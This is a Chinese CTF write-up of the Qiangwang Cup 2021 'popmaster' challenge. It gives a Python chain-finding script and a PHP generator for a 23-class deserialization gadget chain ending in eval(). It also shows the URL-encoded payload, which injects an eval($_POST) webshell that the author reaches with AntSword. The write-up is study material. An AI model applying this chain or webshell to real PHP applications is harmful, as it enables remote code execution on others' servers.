
强网杯2021-popmaster

强网杯2021-popmaster

0x00 写在前面

这个题目虽然当时比赛的时候做出来了,但没办法了,托纳多做不出来了,先拿这个水一篇吧😥。

说一下当时的解题过程吧。一开始看到16万行的代码实在是头大,当时还尝试在phpstorm里疯狂ctrl F、ctrl G。在找了几条最后发现断掉的链子后,我下定了写脚本的决心。

这次就在buu上复现一下吧。

0x01 解题过程

直接写脚本找链子

import linecache
import re
# The obfuscated class file being analysed. All line numbers in this script are
# 1-based positions in this file, following linecache's convention.
filepath = "class.php"
# Line numbers of method_exists-guarded hops that have been visited once; on a
# second visit getNext() falls back to the alternative on the following line.
overlist: list[int] = []
# Guarded hops that have been revisited as well; findpop() skips these when it
# backtracks.
secondlist: list[int] = []
# Class-boundary marker line, read once so the scans can stop at the end of a
# class. The index is specific to the challenge's class file.
str1 = linecache.getline(filepath, 16)
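def find(s):
    """Return the 1-based numbers of every line of ``filepath`` that contains *s*.

    The original scanned a hard-coded range of 169288 line numbers, which only
    fits one particular class file; scanning ``linecache.getlines`` covers the
    whole file whatever its length and avoids one cache lookup per line.

    Args:
        s: substring to look for (a method or class name).

    Returns:
        list[int] of matching line numbers, in file order.
    """
    # Enumerate from 1 so the numbers agree with linecache.getline(), which the
    # other helpers in this script use to read individual lines.
    return [no for no, text in enumerate(linecache.getlines(filepath), 1) if s in text]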

def getNext(num):
    """Locate the next hop reachable from the method whose line is *num*.

    Three scans run in turn over the lines after *num*, each stopping early at
    the class-boundary marker ``str1``:
      1. a ``method_exists``-guarded call   -> (line_no, method_name, 2)
      2. a plain ``$this->prop->method(`` call -> (line_no, method_name, 1)
      3. an ``eval(`` sink                   -> (line_no, 'eval', 0)
    The returned line number is the call site, not the callee's definition.
    Returns the int -1 (not a tuple) when nothing matches, so callers must
    test for that before indexing the result.
    """
    for i in range(15):
        line = linecache.getline(filepath, i + num)
        if str1 == line:
            break
        if 'if(method_exists' in line:
            # Second visit to this method (findpop() put it in overlist on the
            # first one): read the quoted name from the following line instead.
            # NOTE(review): if that line has no quote, split("'")[1] raises IndexError.
            if num in overlist:
                line = linecache.getline(filepath, i + num + 1)
                return i + num + 1, line.split("'")[1], 2
            else:
                return i + num, line.split("'")[1], 2
    for i in range(15):
        line = linecache.getline(filepath, i + num)
        if str1 == line:
            break
        if re.search(r"\$this->[a-zA-Z0-9]+->", line):
            # Method names in the class listing appear to be six characters,
            # hence the [:6] slice of the text after the second '->'.
            return i + num, line.split("->")[2][:6], 1
    for i in range(10):
        line = linecache.getline(filepath, i + num)
        if str1 == line:
            break
        if 'eval(' in line:
            return i + num, 'eval', 0
    print("something wrong")
    return -1


def checkPop(num):
    """Decide whether the method declared at line *num* forwards its parameter
    unchanged.

    Returns True when the parameter looks untouched, False when the first
    statement (or the statement inside a leading ``for`` loop) reassigns the
    parameter from a quoted literal, and -1 when *num* is not a
    ``public function`` line at all.

    Only the line right after the signature (or after a ``for`` header) is
    examined, so a reassignment wrapped in an ``if(...)`` block is not detected.
    """
    header = linecache.getline(filepath, num)
    if 'public function' not in header:
        print("check wrong")
        return -1
    # Parameter name, e.g. "$qf7dS" out of "public function WM5qoB($qf7dS){".
    param = header.split("(")[1].split(")")[0]
    first = linecache.getline(filepath, num + 1)
    if 'for' in first:
        # Loop header: the statement of interest is the one inside the loop.
        body = linecache.getline(filepath, num + 2)
        return param not in body.split('=')[0]
    if param in first and "=" in first:
        lhs = first.split("=")[0]
        rhs = first.split("=")[1]
        reassigned = param in lhs and re.search(r"'[a-zA-Z0-9]+'", rhs)
        return not reassigned
    return True


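def getClass(num):
    """Return ``(head, post)``: the ``class`` line enclosing line *num* and the
    class-boundary marker line that follows *num*.

    Fixes relative to the original: the forward scan compared against
    ``linecache.getline(filepath, 16)`` while the rest of the script uses the
    cached ``str1`` for the same line, so the marker now comes from ``str1``;
    and both scans stop at the file edges (``getline`` returns '' outside the
    file, which previously made either loop spin forever when no ``class``
    line or no marker could be found).
    """
    line = linecache.getline(filepath, num)
    head = num
    # Walk backwards to the nearest line mentioning 'class'.
    while 'class' not in line and head > 1:
        head -= 1
        line = linecache.getline(filepath, head)
    # Walk forwards from *num* until the boundary marker (or end of file).
    post = num
    while line != str1:
        post += 1
        line = linecache.getline(filepath, post)
        if line == '':
            break  # ran past the end of the file without seeing the marker
    return head, post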


def printClass(num):
    """Print the class enclosing line *num* verbatim: from its ``class`` line
    through the boundary marker and the line after it (hence ``+ 2``), without
    adding newlines of its own."""
    head, post = getClass(num)
    for line_no in range(head, post + 2):
        print(linecache.getline(filepath, line_no), end='')


# Line numbers of the methods on the chain found so far; trimmed on backtrack.
pop: list[int] = []
def findpop(b):
    """Follow the call chain from method name *b* until an ``eval(`` sink is
    reached, recording each hop's ``public function`` line in the module-level
    ``pop`` list and printing the list after every step.

    Backtracking: when checkPop() reports that a hop rewrites its argument, the
    search jumps back to the most recent method_exists-guarded hop that has not
    been exhausted (overlist / secondlist), trims ``pop`` to that point and lets
    getNext() try that hop's alternative branch.
    """
    global pop
    flag = True
    # (previous call-site line, name); the dummy start value matches nothing.
    ne = (1, 2)
    while (flag):
        p = find(b)
        # getNext() reports the call-site line, which also contains *b*, so
        # when it is the first hit skip it and take the next one — presumably
        # the method's definition.
        # NOTE(review): p is empty when the name is not found; p[0] then
        # raises IndexError.
        if ne[0] == p[0]:
            i = p[1]
        else:
            i = p[0]
        pop.append(i)
        print(pop)
        if not checkPop(i):
            # NOTE(review): overlist[-1] raises IndexError if no guarded hop
            # has been seen yet.
            i = overlist[-1]
            a = -1
            while i in secondlist:
                a = a - 1
                i = overlist[a]
            n = pop.index(i)
            pop = pop[:n + 1]
        ne = getNext(i)
        # NOTE(review): getNext() returns the int -1 when nothing matches, so
        # ne[2] raises TypeError here and the run ends with a traceback.
        if ne[2] == 2:
            # Guarded hop: first visit -> remember as a backtrack target;
            # second visit -> mark it exhausted.
            if i not in overlist:
                overlist.append(i)
            else:
                secondlist.append(i)
        b = ne[1]
        if b == 'eval':
            print('pop= ')
            print(pop)
            flag = False

# Start the search from the method name "WM5qoB"; G9rCaG::WM5qoB heads the
# chain in the class listing below, and every other hop is discovered from it.
findpop("WM5qoB")

找到能用的链子后,把pop数组记录下来,然后把从头到尾用到的类输出成文件

# Chain recorded from a findpop() run: one 'public function' line number per
# hop, in chain order.
pop = [145447, 25609, 80058, 11377, 46114, 117321, 106318, 95223, 53650, 97950, 98378, 138945, 3553, 150848, 20188, 34779, 137484, 62125, 61866, 87945, 118437, 92706, 41101]
# Dump every class on the chain in order (redirect stdout to collect them).
for line_no in pop:
    printClass(line_no)

对每个类加一个__construct方法然后serialize

<?php
// Hop 1 (chain entry): WM5qoB() loops copying its argument into an unused
// local, then forwards it unchanged to the object held in $NOVqmuA.
class G9rCaG{
    public $NOVqmuA;
    public function WM5qoB($qf7dS){
        for($i = 0; $i < 36; $i ++){
            $apGDGv= $qf7dS;
        }
        $this->NOVqmuA->Lggqkg($qf7dS);
    }
    // Added for payload generation: nests the next hop so serialize() emits it.
    public function __construct(){
        $this->NOVqmuA=new IL3igR();
    }
}

// Hop 2: filler loop, then an unconditional forward of the argument.
class IL3igR{
    public $ozxXPmy;
    public function Lggqkg($ax50G){
        for($i = 0; $i < 23; $i ++){
            $axVUWV= $ax50G;
        }
        $this->ozxXPmy->vvSiHx($ax50G);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->ozxXPmy=new Gsm13c();
    }
}

// Hop 3: writes an undeclared (dynamic) property, then a method_exists-guarded
// forward. The guard passes because __construct pre-fills $cgmVUXR with an
// object that defines DggEHy().
class Gsm13c{
    public $cgmVUXR;
    public function vvSiHx($O89Xw){
        $this->z72B2 = "V2wdO";
        if(method_exists($this->cgmVUXR, 'DggEHy')) $this->cgmVUXR->DggEHy($O89Xw);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->cgmVUXR=new zy2z5O();
    }
}

// Hop 4: dynamic-property write, then an unconditional forward.
class zy2z5O{
    public $GFd8e3a;
    public function DggEHy($Gp0Sg){
        $this->lDRnE = "tWZRT";
        $this->GFd8e3a->qpzsuz($Gp0Sg);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->GFd8e3a=new BLCEZg();
    }
}

// Hop 5: filler loop, then a method_exists-guarded forward.
class BLCEZg{
    public $KwZ6GaY;
    public function qpzsuz($Ltg4A){
        for($i = 0; $i < 39; $i ++){
            $aIg0Zq= $Ltg4A;
        }
        if(method_exists($this->KwZ6GaY, 'gA0okl')) $this->KwZ6GaY->gA0okl($Ltg4A);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->KwZ6GaY=new lkKlRc();
    }
}

// Hop 6: the if-condition is a constant-false comparison (3461 > 10533), so
// the suffix is never appended; the argument is forwarded unchanged.
class lkKlRc{
    public $O1DZW3A;

    public function gA0okl($ZD0Za){
        if(3461>10533){
            $ZD0Za = $ZD0Za.'F01Sc';
        }
        $this->O1DZW3A->zfeN0F($ZD0Za);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->O1DZW3A=new z8Upeh();
    }
}

// Hop 7: filler loop, then an unconditional forward.
class z8Upeh{
    public $R6YvEfM;
    public function zfeN0F($R6pUg){
        for($i = 0; $i < 27; $i ++){
            $aits6h= $R6pUg;
        }
        $this->R6YvEfM->SyrGZV($R6pUg);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->R6YvEfM=new UI67yc();
    }
}

// Hop 8: filler loop, then an unconditional forward.
class UI67yc{
    public $d0UXrbp;
    public function SyrGZV($dMwdv){
        for($i = 0; $i < 11; $i ++){
            $aZWsSP= $dMwdv;
        }
        $this->d0UXrbp->qt42U0($dMwdv);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->d0UXrbp=new EEccn4();
    }
}

// Hop 9: dynamic-property write, then a method_exists-guarded forward.
class EEccn4{
    public $EZkFlMe;
    public function qt42U0($C3fnR){
        $this->Scutg = "saSCZ";
        if(method_exists($this->EZkFlMe, 'GRYmu2')) $this->EZkFlMe->GRYmu2($C3fnR);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->EZkFlMe=new Kkcmro();
    }
}

// Hop 10: dynamic-property write, then a method_exists-guarded forward.
class Kkcmro{
    public $AEqZTbK;
    public function GRYmu2($inaxb){
        $this->aiNyz = "fWauD";
        if(method_exists($this->AEqZTbK, 'vaeNwt')) $this->AEqZTbK->vaeNwt($inaxb);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->AEqZTbK=new UGcy4B();
    }
}

// Hop 11: filler loop, then an unconditional forward.
class UGcy4B{
    public $VvUauZX;
    public function vaeNwt($b1HfP){
        for($i = 0; $i < 2; $i ++){
            $avNXUg= $b1HfP;
        }
        $this->VvUauZX->BddQNE($b1HfP);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->VvUauZX=new AThehG();
    }
}

// Hop 12: filler loop, then a method_exists-guarded forward.
class AThehG{
    public $qMUucp4;
    public function BddQNE($xtU5H){
        for($i = 0; $i < 40; $i ++){
            $aNI3rm= $xtU5H;
        }
        if(method_exists($this->qMUucp4, 'ayevu8')) $this->qMUucp4->ayevu8($xtU5H);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->qMUucp4=new ggkoyD();
    }
}

// Hop 13: filler loop, then a method_exists-guarded forward.
class ggkoyD{
    public $qvO0GzP;
    public function ayevu8($UcnVU){
        for($i = 0; $i < 38; $i ++){
            $aIn9Tg= $UcnVU;
        }
        if(method_exists($this->qvO0GzP, 'Kx77Y3')) $this->qvO0GzP->Kx77Y3($UcnVU);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->qvO0GzP=new O2OxaK();
    }
}

// Hop 14: dynamic-property write, then a method_exists-guarded forward.
class O2OxaK{
    public $uplrfgQ;
    public function Kx77Y3($BgoB3){
        $this->WMHco = "fcRR0";
        if(method_exists($this->uplrfgQ, 'ZGs4dd')) $this->uplrfgQ->ZGs4dd($BgoB3);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->uplrfgQ=new h1F4az();
    }
}

// Hop 15: filler loop, then a method_exists-guarded forward.
class h1F4az{
    public $t0lDuz4;
    public function ZGs4dd($ioVMW){
        for($i = 0; $i < 13; $i ++){
            $aSOqUc= $ioVMW;
        }
        if(method_exists($this->t0lDuz4, 'iXVD4B')) $this->t0lDuz4->iXVD4B($ioVMW);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->t0lDuz4=new SCi618();
    }
}

// Hop 16: dynamic-property write, then a method_exists-guarded forward.
class SCi618{
    public $Ut1w0Vl;

    public function iXVD4B($mFlmQ){
        $this->FU7nm = "SkzgX";
        if(method_exists($this->Ut1w0Vl, 'nnnwoE')) $this->Ut1w0Vl->nnnwoE($mFlmQ);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->Ut1w0Vl=new GPAULF();
    }
}

// Hop 17: the if-condition is constant-TRUE (20294 > 11825), so 'KP9UQ' IS
// appended to the argument before the guarded forward — the string reaching
// the sink is no longer the original. The writeup's checkPop() does not flag
// this pattern, since it only inspects the line right after the signature.
class GPAULF{
    public $TmSDBF1;
    public function nnnwoE($yTGH3){
        if(20294>11825){
            $yTGH3 = $yTGH3.'KP9UQ';
        }
        if(method_exists($this->TmSDBF1, 's2smK4')) $this->TmSDBF1->s2smK4($yTGH3);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->TmSDBF1=new Vt6a7G();
    }
}

// Hop 18: single-iteration filler loop, then a method_exists-guarded forward.
class Vt6a7G{
    public $GBn2F2i;
    public function s2smK4($nNTTK){
        for($i = 0; $i < 1; $i ++){
            $aIQNhP= $nNTTK;
        }
        if(method_exists($this->GBn2F2i, 'SPq29m')) $this->GBn2F2i->SPq29m($nNTTK);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->GBn2F2i=new vyWaaw();
    }
}

// Hop 19: constant-TRUE condition (65178 > 56814) — 'dPwhC' IS appended to the
// argument before the guarded forward, like hop 17 (GPAULF).
class vyWaaw{
    public $YWdwezk;
    public function SPq29m($OB7Dp){
        if(65178>56814){
            $OB7Dp = $OB7Dp.'dPwhC';
        }
        if(method_exists($this->YWdwezk, 'MAmvvi')) $this->YWdwezk->MAmvvi($OB7Dp);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->YWdwezk=new Tbcuhd();
    }
}

// Hop 20: filler loop, then an unconditional forward.
class Tbcuhd{
    public $gx0ckQv;

    public function MAmvvi($izexU){
        for($i = 0; $i < 17; $i ++){
            $abdhC5= $izexU;
        }
        $this->gx0ckQv->it9Nqv($izexU);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->gx0ckQv=new D5TBKu();
    }
}

// Hop 21: constant-false condition (35336 > 62948), so no suffix is appended;
// then a method_exists-guarded forward.
class D5TBKu{
    public $w6ehUeT;
    public function it9Nqv($uhekL){
        if(35336>62948){
            $uhekL = $uhekL.'UIP6P';
        }
        if(method_exists($this->w6ehUeT, 'P3CKmc')) $this->w6ehUeT->P3CKmc($uhekL);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->w6ehUeT=new RbWK29();
    }
}

// Hop 22: dynamic-property write, then a method_exists-guarded forward to the sink class.
class RbWK29{
    public $IvGFh4x;
    public function P3CKmc($mco3K){
        $this->GTCgp = "MrYXz";
        if(method_exists($this->IvGFh4x, 'nluxMc')) $this->IvGFh4x->nluxMc($mco3K);
    }
    // Added for payload generation: nests the next hop.
    public function __construct(){
        $this->IvGFh4x=new mrgKmO();
    }
}

// Hop 23 (sink): constant-false condition (6937 > 42691), then eval() of the
// forwarded string. This is the dangerous call the whole object graph is built
// to reach: with unserialize() on untrusted input, the attacker chooses which
// objects exist and therefore which methods run. Mitigation in real code: never
// eval() data, and avoid unserialize() on user input (prefer json_decode(), or
// at least unserialize($s, ['allowed_classes' => false])).
class mrgKmO{
    public $Ysi1doA;
    public function nluxMc($CGfQO){
        if(6937>42691){
            $CGfQO = $CGfQO.'VDQ19';
        }
        eval($CGfQO);
    }
    // Last hop: nothing to nest, so the property stays null in the output.
    public function __construct(){
    }
}

// Serialize the fully wired object graph (entry class outermost) and URL-encode
// it for use as a query-string value.
echo urlencode(serialize(new G9rCaG()));
?>

payload

http://eci-2ze5gk2yzr3zlt8hemzk.cloudeci1.ichunqiu.com?pop=O%3A6%3A%22G9rCaG%22%3A1%3A%7Bs%3A7%3A%22NOVqmuA%22%3BO%3A6%3A%22IL3igR%22%3A1%3A%7Bs%3A7%3A%22ozxXPmy%22%3BO%3A6%3A%22Gsm13c%22%3A1%3A%7Bs%3A7%3A%22cgmVUXR%22%3BO%3A6%3A%22zy2z5O%22%3A1%3A%7Bs%3A7%3A%22GFd8e3a%22%3BO%3A6%3A%22BLCEZg%22%3A1%3A%7Bs%3A7%3A%22KwZ6GaY%22%3BO%3A6%3A%22lkKlRc%22%3A1%3A%7Bs%3A7%3A%22O1DZW3A%22%3BO%3A6%3A%22z8Upeh%22%3A1%3A%7Bs%3A7%3A%22R6YvEfM%22%3BO%3A6%3A%22UI67yc%22%3A1%3A%7Bs%3A7%3A%22d0UXrbp%22%3BO%3A6%3A%22EEccn4%22%3A1%3A%7Bs%3A7%3A%22EZkFlMe%22%3BO%3A6%3A%22Kkcmro%22%3A1%3A%7Bs%3A7%3A%22AEqZTbK%22%3BO%3A6%3A%22UGcy4B%22%3A1%3A%7Bs%3A7%3A%22VvUauZX%22%3BO%3A6%3A%22AThehG%22%3A1%3A%7Bs%3A7%3A%22qMUucp4%22%3BO%3A6%3A%22ggkoyD%22%3A1%3A%7Bs%3A7%3A%22qvO0GzP%22%3BO%3A6%3A%22O2OxaK%22%3A1%3A%7Bs%3A7%3A%22uplrfgQ%22%3BO%3A6%3A%22h1F4az%22%3A1%3A%7Bs%3A7%3A%22t0lDuz4%22%3BO%3A6%3A%22SCi618%22%3A1%3A%7Bs%3A7%3A%22Ut1w0Vl%22%3BO%3A6%3A%22GPAULF%22%3A1%3A%7Bs%3A7%3A%22TmSDBF1%22%3BO%3A6%3A%22Vt6a7G%22%3A1%3A%7Bs%3A7%3A%22GBn2F2i%22%3BO%3A6%3A%22vyWaaw%22%3A1%3A%7Bs%3A7%3A%22YWdwezk%22%3BO%3A6%3A%22Tbcuhd%22%3A1%3A%7Bs%3A7%3A%22gx0ckQv%22%3BO%3A6%3A%22D5TBKu%22%3A1%3A%7Bs%3A7%3A%22w6ehUeT%22%3BO%3A6%3A%22RbWK29%22%3A1%3A%7Bs%3A7%3A%22IvGFh4x%22%3BO%3A6%3A%22mrgKmO%22%3A1%3A%7Bs%3A7%3A%22Ysi1doA%22%3BN%3B%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D&argv=eval($_POST['a']);/*

直接蚁剑连接,根目录下拿到flag

0x02 写在最后

又流产了。当时的脚本好像出了点问题。或者buu上的题目不太一样。这篇是当时比赛之后写的wp,让我水一篇吧。呜呜呜。

0x03 7月9日补充

发现是自己脚本里的linecache.getline(filepath,17)中的17是和具体class文件有关的。按照具体题目的class文件改一下就行了。按照上面的流程,终于在buu把这道题复现了。